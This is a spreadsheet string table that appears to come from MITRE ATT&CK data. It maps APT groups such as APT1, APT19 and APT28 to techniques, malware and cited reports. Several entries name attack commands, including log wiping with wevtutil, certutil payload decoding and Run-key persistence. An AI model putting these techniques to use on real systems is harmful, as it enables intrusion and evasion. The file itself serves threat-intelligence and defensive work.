    <t>relationship--bab6aadc-7a93-43e4-88cb-904fd1f2fddd</t>
  </si>
  <si>
    <t>relationship--80d72d09-c1a4-4735-b85a-28bfc19ef8b9</t>
  </si>
  <si>
    <t>relationship--f9600732-9116-4325-8073-28d81721b37a</t>
  </si>
  <si>
    <t>(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--a552bf3d-a438-406f-8f5b-8e263adad080</t>
  </si>
  <si>
    <t>S0153</t>
  </si>
  <si>
    <t>RedLeaves</t>
  </si>
  <si>
    <t>malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: DOJ APT10 Dec 2018)</t>
  </si>
  <si>
    <t>relationship--3dd745f5-1c0c-4376-8850-89679fcd4e31</t>
  </si>
  <si>
    <t>S0159</t>
  </si>
  <si>
    <t>SNUGRIDE</t>
  </si>
  <si>
    <t>malware--3240cbe4-c550-443b-aa76-cc2a7058b870</t>
  </si>
  <si>
    <t>(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--15aa00d1-11c0-4be1-a900-ede5e1376110</t>
  </si>
  <si>
    <t>03 September 2019</t>
  </si>
  <si>
    <t>S0627</t>
  </si>
  <si>
    <t>SodaMaster</t>
  </si>
  <si>
    <t>malware--94d6d788-07bb-4dcc-b62f-e02626b00108</t>
  </si>
  <si>
    <t>relationship--464f060e-5c48-4f73-a672-c61bb22740c6</t>
  </si>
  <si>
    <t>S0275</t>
  </si>
  <si>
    <t>UPPERCUT</t>
  </si>
  <si>
    <t>malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa</t>
  </si>
  <si>
    <t>(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--14702113-ddd7-4898-902a-aeb884b26266</t>
  </si>
  <si>
    <t>(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--10af8211-36f6-4152-8221-c152407bd969</t>
  </si>
  <si>
    <t>relationship--99800503-d535-4fae-a318-dfa034dca663</t>
  </si>
  <si>
    <t>relationship--d608c524-ad0a-4595-8fe2-4a0ec0dbf501</t>
  </si>
  <si>
    <t>02 November 2019</t>
  </si>
  <si>
    <t>relationship--4aa62b6b-7441-4ece-9cb0-2a5bcb46f966</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has downloaded binary data from a specified domain after the malicious document is opened.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--c3bedbae-b1e1-4a35-8c59-d181dca093e4</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has prompted victims to accept macros in order to execute the subsequent payload.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--20599767-204a-4cbf-ada7-0f931ee925e4</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has disguised its scheduled tasks as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--5cabd775-7d78-4150-b529-bb8cfb747013</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has used port 4050 for C2 communications.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--db0f9f05-6f76-47c3-81bf-a59d85045188</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</si>
  <si>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</si>
  <si>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relationship--7b4b8d0b-fbc3-469a-ab62-72c5c4c4653d</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has used a macro function to set scheduled tasks, disguised as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--aa5d5fcd-db19-4593-a958-b09853ceb372</t>
  </si>
  <si>
    <t xml:space="preserve">[APT-C-36](https://attack.mitre.org/groups/G0099) has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.(Citation: QiAnXin APT-C-36 Feb2019) </t>
  </si>
  <si>
    <t>relationship--ee00cd55-254b-4780-be47-e0f78a327c93</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) obtained and used a modified variant of [Imminent Monitor](https://attack.mitre.org/software/S0434).(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--6c89f28c-963b-44ef-8dda-5916aa17b7e9</t>
  </si>
  <si>
    <t>26 May 2021</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has embedded a VBScript within a malicious Word document which is executed upon the document opening.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--d4922804-7216-4e83-b0c0-6e61b09d5fc0</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has used RAR to compress files before moving them outside of the victim network.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--43c34939-8236-4ddd-8def-0eb7b5fe62cf</t>
  </si>
  <si>
    <t>30 March 2020</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used a batch script to perform a series of discovery techniques and saves it to a text file.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--4c2924c1-dec5-4390-87d7-c52e24a92512</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has collected files from a local victim.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--38a72b32-dc04-493d-8b92-31174c32f3ed</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has registered hundreds of domains for use in operations.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--40e49390-e8a5-4d91-8ec9-d05fb3b71149</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--c1c2c530-a2d2-4c2f-bcff-ceda0277de59</t>
  </si>
  <si>
    <t>13 October 2020</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has created email accounts for later use in social engineering, phishing, and when registering domains.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--9b14bfc1-2c78-4ec9-ad02-aeed6f1cf83e</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has been known to use credential dumping using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--28b27852-4125-4639-a07b-0b97dfdb650a</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used the commands &lt;code&gt;net localgroup&lt;/code&gt;,&lt;code&gt;net user&lt;/code&gt;, and &lt;code&gt;net group&lt;/code&gt; to find accounts on the system.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--d014d8e1-b12e-4b85-84ee-ff4338c54393</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--757bed64-558b-4ea7-84b9-b82d8b23f9b2</t>
  </si>
  <si>
    <t>17 March 2020</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used publicly available malware for privilege escalation.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--7b817a81-02a9-48f0-8166-9e25b6860a76</t>
  </si>
  <si>
    <t>The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by [APT1](https://attack.mitre.org/groups/G0006) as a name for malware.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--c7823efd-005f-49ad-94cf-ebc44a87abed</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) listed connected network shares.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--e07b76a4-98d7-4adc-b90e-a1f7f2266867</t>
  </si>
  <si>
    <t>The [APT1](https://attack.mitre.org/groups/G0006) group is known to have used pass the hash.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--3b35fec9-ee0d-4c2d-9936-0aa06ad6a49a</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) gathered a list of running processes on the system using &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--38416e2a-3590-4827-9a6f-d8f1df6568af</t>
  </si>
  <si>
    <t>The [APT1](https://attack.mitre.org/groups/G0006) group is known to have used RDP during operations.(Citation: FireEye PLA)</t>
  </si>
  <si>
    <t>relationship--fc2ffb01-2c4e-429d-b4fd-e0d20678504a</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) uses two utilities, GETMAIL and MAPIGET, to steal email. MAPIGET steals email still on Exchange servers that has not yet been archived.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--4eb5fba5-be97-4103-9b52-f77e02765fad</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has sent spearphishing emails containing malicious attachments.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--de4ae50a-0561-4d01-885a-eab60008d5eb</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has sent spearphishing emails containing hyperlinks to malicious files.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--5bc68652-1d99-4782-80bd-086fc7f8358c</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather network configuration information.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--635c959b-acf4-464a-a240-f299f5fea753</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used the &lt;code&gt;net use&lt;/code&gt; command to get a listing on network connections.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--886942af-c1e9-49e9-af7e-98d1899f3000</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used the commands &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;tasklist&lt;/code&gt; to get a listing of the services on the system.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--f9c7127d-2a27-4dcf-bef5-9150a6c4334d</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has used various open-source tools for privilege escalation purposes.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--f55814a0-9e57-4bf3-bc40-21e7d3fca230</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has used the Windows command shell to execute commands, and batch scripting to automate execution.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--ea40711b-461d-4629-b1fd-5f020b1f3257</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used blogs and WordPress for C2 infrastructure.(Citation: Meyers Numbered Panda)</t>
  </si>
  <si>
    <t>relationship--5a49400c-2003-463c-8e6e-97b79f560675</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</si>
  <si>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</si>
  <si>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relationship--66647c20-2d76-4711-9eee-07d932e75851</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</si>
  <si>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</si>
  <si>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relationship--75b6869c-dd4e-44ec-8614-97fe792e9dd6</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has attempted to get victims to open malicious Microsoft Word and PDF attachment sent via spearphishing.(Citation: Moran 2014)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--0c9b6c09-8fc9-42c7-bfd7-316e9bbfa271</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has sent emails with malicious Microsoft Office documents and PDFs attached.(Citation: Moran 2014)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--8126e72d-1be0-4237-b9c9-33045be072c3</t>
  </si>
  <si>
    <t>[APT16](https://attack.mitre.org/groups/G0023) has compromised otherwise legitimate sites as staging servers for second-stage payloads.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>relationship--82bfe762-9468-458e-801a-13387a271521</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</si>
  <si>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</si>
  <si>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relationship--fd9834dc-0323-408b-b217-3f3aa27b50ac</t>
  </si>
  <si>
    <t>[APT17](https://attack.mitre.org/groups/G0025) has created profile pages in Microsoft TechNet that were used as C2 infrastructure.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>relationship--41ca57db-9736-4adf-ac5d-ea2be2ab4860</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) actors used the native [at](https://attack.mitre.org/software/S0110) Windows task scheduler tool to use scheduled tasks for execution on a victim network.(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>relationship--67f19627-27a5-4898-bab5-7b235aa4ad77</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) uses DNS for C2 communications.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>relationship--c1cf88bc-6229-4d62-86f5-36aa0e7bd21a</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) actors leverage legitimate credentials to log into external remote services.(Citation: RSA2017 Detect and Respond Adair)</t>
  </si>
  <si>
    <t>relationship--3b521f87-a77d-4c8d-8ab8-ffc6dbc3d62e</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) actors deleted tools and batch files from victim systems.(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>relationship--6175bbbe-1bc1-4562-8c5f-9e437348636a</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) can list files information for specific directories.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>relationship--e3417dc3-f784-4306-8466-65a0067b63f1</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) can upload a file to the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>relationship--882c68e3-5f01-4438-a430-ff22692d8910</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) obfuscates strings in the payload.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>relationship--23bd8e78-b20d-41bd-acfb-5ed356b327b2</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) establishes persistence via the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key.(Citation: Anomali Evasive Maneuvers July 2015)(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>relationship--e47f03aa-09b3-45a2-927d-b2cd96e7c444</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) can collect system information from the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>relationship--c47e35e1-cf8a-4c2b-b63d-25b37a008226</t>
  </si>
  <si>
    <t>relationship--1ac5bace-cdc2-4a1b-abad-d30ca0ed7f45</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) uses HTTP for C2 communications.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>relationship--d7d7b5e5-aceb-473b-aeaa-f1287d8d0542</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) uses cmd.exe to execute commands on the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)(Citation: Anomali Evasive Maneuvers July 2015)</t>
  </si>
  <si>
    <t>relationship--e453cf75-0df0-45e5-a5ce-e0984bf864f8</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used Base64 to obfuscate executed commands.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--fd78292b-d484-4d08-baa4-f6b58bb63622</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) downloaded and launched code within a SCT file.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--4f2e62d0-5345-45dc-9e9d-46bb11c5f35d</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--f35a3ca7-b916-4bc2-a493-613196b5d41e</t>
  </si>
  <si>
    <t>An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant decrypts strings using single-byte XOR keys.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--f84b2658-a891-45a8-93ff-14dc0a86df10</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) performed a watering hole attack on forbes.com in 2014 to compromise targets.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--478f7f77-6b6b-4949-ac87-f28419b5e2ab</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used &lt;code&gt;-W Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--2e6e8722-d09d-402e-9ea8-ccf8412339d0</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) attempted to get users to launch malicious attachments delivered via spearphishing emails.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--b033e131-e448-46c6-815b-b86e4bd6d638</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) uses a Port 22 malware variant to modify several Registry keys.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--45f35ec0-73a8-42a6-b879-d800d27211c8</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used Base64 to obfuscate payloads.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--59cccc5a-f6f9-4a2f-aa74-2b7235b1855c</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used PowerShell commands to execute payloads.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--1219cbd2-26b8-4a2e-bbf1-477afc396203</t>
  </si>
  <si>
    <t>An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant establishes persistence by setting the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\&lt;/code&gt;.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--04558d61-aa04-46b5-a65f-921011ac9621</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used Regsvr32 to bypass application control techniques.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--f832e042-6859-4415-9b6c-4e093dc955ec</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) configured its payload to inject into the rundll32.exe.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--3bcfc38f-5fe8-4c66-8352-d3ba71c4f3ec</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--818b440b-075d-483d-83ff-9991a78e25f4</t>
  </si>
  <si>
    <t>An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant used Base64 to encode communications to the C2 server.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--d1b46f3e-b25c-43c0-9ab2-ef6e5ff8270c</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</si>
  <si>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</si>
  <si>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relationship--c3d9182c-178b-4d8d-91d8-f4d1313738bb</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--322703cc-c8f9-4046-8a61-e165a2d11bc7</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--331ebf73-af72-4121-815a-d10392ac75ab</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) has obtained and used publicly-available tools like [Empire](https://attack.mitre.org/software/S0363).(Citation: NCSC Joint Report Public Tools)(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--e6b509c8-0e00-48ac-b76d-f42d18a0ae51</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used HTTP for C2 communications. [APT19](https://attack.mitre.org/groups/G0073) also used an HTTP malware variant to communicate over HTTP for C2.(Citation: FireEye APT19)(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--4a6c44ec-a1de-4fbc-88ef-d3003137a2fc</t>
  </si>
  <si>
    <t>An [APT19](https://attack.mitre.org/groups/G0073) Port 22 malware variant registers itself as a service.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>relationship--4999a323-b025-4a1d-8c80-5ae36b2f5a0d</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a Powershell cmdlet to grant the &lt;code&gt;ApplicationImpersonation&lt;/code&gt; role to a compromised account.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--c75b8dfa-5980-4686-9d74-b0c92ce60274</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>relationship--ae0b56df-e692-4210-85e4-8ded095cdbc3</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>relationship--63ee7d80-372e-4841-87a4-825cb5dd7058</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a variety of utilities, including WinRAR, to archive collected data with password protection.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--90bb9179-c20a-4223-a177-731f015052aa</t>
  </si>
  <si>
    <t>relationship--715d1910-181b-47a8-9b3c-86cba51b8ba4</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used Google Drive for C2.(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>relationship--da759124-8047-4b58-b7d4-fa9300cb4ce1</t>
  </si>
  <si>
    <t>19 April 2021</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</si>
  <si>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</si>
  <si>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relationship--9e90e4a5-844c-4516-9044-6f35bbf27806</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) can perform brute force attacks to obtain credentials.(Citation: TrendMicro Pawn Storm 2019)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Microsoft Targeting Elections September 2020)</t>
  </si>
  <si>
    <t>relationship--fb719ee1-0be9-41c5-bb52-56c033091e99</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has cleared event logs, including by using the commands &lt;code&gt;wevtutil cl System&lt;/code&gt; and &lt;code&gt;wevtutil cl Security&lt;/code&gt;.(Citation: Crowdstrike DNC June 2016)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>relationship--4b8d211d-4969-4c0f-8b01-fd176c8172d1</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--72f52cf0-dc68-4a4b-8025-724b2691c449</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) uses a tool that captures information from air-gapped computers via an infected USB and transfers it to network-connected computer when the USB is inserted.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--c569059f-8a7d-4777-a111-d3ab62d178ca</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used COM hijacking for persistence by replacing the legitimate &lt;code&gt;MMDeviceEnumerator&lt;/code&gt; object with a payload.(Citation: ESET Sednit Part 1)(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>relationship--54d3eadf-0363-47d1-b51d-a16d6a99c42e</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has harvested user's login credentials.(Citation: Microsoft Targeting Elections September 2020)</t>
  </si>
  <si>
    <t>relationship--05f6442b-1ba8-4356-9e3a-17edc6236a10</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has split archived exfiltration files into chunks smaller than 1MB.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--b4c27a33-0669-4b10-a801-eb81e3563260</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has collected files from various information repositories.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--8d07ed87-6692-4010-8c94-c12cbf3885ca</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</si>
  <si>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</si>
  <si>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relationship--73e0604a-2509-43a6-9318-a9494e570363</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has collected files from network shared drives.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--41fd6ebb-4262-40f8-842e-ff583ff01500</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) backdoor may collect the entire contents of an inserted USB device.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--78e8d9e6-48b7-473f-af94-43f626de7931</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) macro uses the command &lt;code&gt;certutil -decode&lt;/code&gt; to decode contents of a .txt file storing the base64 encoded payload.(Citation: Unit 42 Sofacy Feb 2018)(Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>relationship--921c2a85-eab7-4cfc-9ac5-98a463262c17</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</si>
  <si>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</si>
  <si>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relationship--0d1605a9-9a62-401d-af07-84b481bddb66</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has compromised targets via strategic web compromise utilizing custom exploit kits.(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--51fcdcd6-9c5a-425a-ab87-92d4faeb2ea4</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</si>
  <si>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</si>
  <si>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relationship--69f57458-bfb2-44a2-a8cf-0fce0e2b0a22</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used compromised email accounts to send credential phishing emails.(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>relationship--1b44ae9f-29b7-45e0-9396-a84899e73a3b</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--16ec2171-a002-4838-8e20-af89b2eeafd0</t>
  </si>
  <si>
    <t xml:space="preserve">[APT28](https://attack.mitre.org/groups/G0007) can exfiltrate data over Google Drive.(Citation: TrendMicro Pawn Storm Dec 2020) </t>
  </si>
  <si>
    <t>relationship--2cbaf5dd-8b53-427f-ae00-9cda47125d5b</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</si>
  <si>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</si>
  <si>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relationship--329d115e-2a1d-443e-800c-d28f5f11d6b9</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>relationship--1b3f3de6-364e-443f-8b34-62073c801a5b</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used CVE-2015-4902 to bypass security features.(Citation: Bitdefender APT28 Dec 2015)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--e5706e1a-33a9-4404-9ef8-c8aa428363ec</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges.(Citation: Bitdefender APT28 Dec 2015)(Citation: Microsoft SIR Vol 19)(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>relationship--cce31baa-5862-4df5-806f-15aaa7410fa5</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.(Citation: FireEye APT28)(Citation: FireEye APT28 Hospitality Aug 2017)(Citation: MS17-010 March 2017)</t>
  </si>
  <si>
    <t>relationship--a358f0a9-b5b9-4a84-8c83-dc0a1325d63e</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</si>
  <si>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</si>
